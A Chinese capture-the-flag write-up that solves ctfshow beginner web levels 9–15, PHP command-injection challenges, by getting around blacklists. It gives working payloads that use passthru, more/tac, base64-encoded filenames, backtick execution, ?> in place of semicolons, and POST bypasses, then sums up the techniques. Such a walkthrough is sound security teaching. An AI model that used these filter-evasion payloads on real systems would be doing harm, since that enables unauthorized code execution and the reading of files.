ctfshow_萌新web9-web15-----rce

_萌新web9

?c=highlight_file("config.php");

_萌新web10

这题要绕过system,exec,highlight

?c=passthru("cat%20config.php");

_萌新web11

这次cat也给过滤掉了

查看文件内容的话可以使用 more命令来代替 cat

?c=passthru('more config.php')

_萌新web12

连'.',php,config文件名被过滤了

base64加密绕过

config.php经过加密为Y29uZmlnLnBocA==

构造:

?c=a=base64_decode('Y29uZmlnLnBocA==');passthru("more a");

但是我一开始passthru里面用到单引号,没拿到flag

?c=a=base64_decode('Y29uZmlnLnBocA==');passthru('more a');这个不对

PHP中的单引号和双引号在很多时候都是互通的,但是也存在区别:

其中的内容不会经过解释(\n不会输出为换行,而是直接输出),即内容会与输入的内容一致,

双引号中的内容将会被解释,即解析内容中的变量。

但是双引号中插入单引号,如果变量存在的话,还是可以执行的;如果所包含的变量需要解析时,要使用到双引号。

法二:反引号绕过

反引号``, 可以执行系统命令, 并返回一个字符串类型的变量, 用来保存命令的执行结果, 需要注意的是, 反引号``中的命令会先被执行并将结果以字符串类型的变量返回, 而后再参与到其他代码的执行, 类似一个函数

?c=echo `ls | grep con*`;

将返回结果作为文件名使用 more命令查看文件内容, 即可获取 flag

?c=passthru('more `ls | grep con*`');也可以成功拿到flag

_萌新web13

对分号;的过滤, 我们可以使用 ?> 代替 分号

?c=passthru('more `ls | grep con*`')?>

_萌新web14

这回连括号也过滤了

?c=echo `tac *`?>

_萌新web15

过滤了?,*,highlight,文件名,没过滤分号

1.由于过滤了左括号(, 函数不能使用, 需要使用反引号``来执行系统命令

2.过滤了 . php config 等关键字, 这就导致查看 config.php 文件会更加困难, 但这些过滤只针对GET请求的参数, 而POST请求并未限制, 我们可以通过POST请求提交系统命令

根据黑名单的不同,获取config.php的内容有以下几种方法:

总结
  1. cat 可以用more,tac
  2. 文件名被绕过 使用反引号`或base64加密绕过
  3. 对分号;的过滤, 我们可以使用 ?> 代替
  4. 过滤了左括号(, 函数不能使用, 需要使用反引号``来执行系统命令
  5. 最后一招,这些过滤只针对GET请求的参数, 而POST请求并未限制, 我们可以通过POST请求提交系统命令
相关推荐
Pure_White_Sword18 小时前
[广东省大学生攻防大赛 2022]pyre
网络安全·ctf·reverse·逆向工程
泷羽Sec-静安1 天前
AICTFer一天速成指南
python·sql·ctf
ad禥思妙想2 天前
BUUCTF_刷题记录(二)
ctf
0vvv03 天前
2026-NCTF-web-N-RustPICA
前端·ctf
yv_303 天前
ssti靶场练习(sstilabs,重庆橘子科技)
ctf·ssti
祁白_7 天前
Bugku:备份是一个好习惯
笔记·学习·web安全·ctf
蒲公英eric8 天前
攻防世界 misc题GFSJ0403-【intoU】
ctf·misc·攻防世界·音频题
kali-Myon10 天前
CTFshow-Pwn142-Off-by-One(堆块重叠)
c语言·数据结构·安全·gdb·pwn·ctf·
三七吃山漆10 天前
BUUCTF[极客大挑战 2019]Http
web安全·网络安全·ctf·极客大挑战
unable code11 天前
[HNCTF 2022 WEEK2]ez_ssrf
网络安全·web·ctf·1024程序员节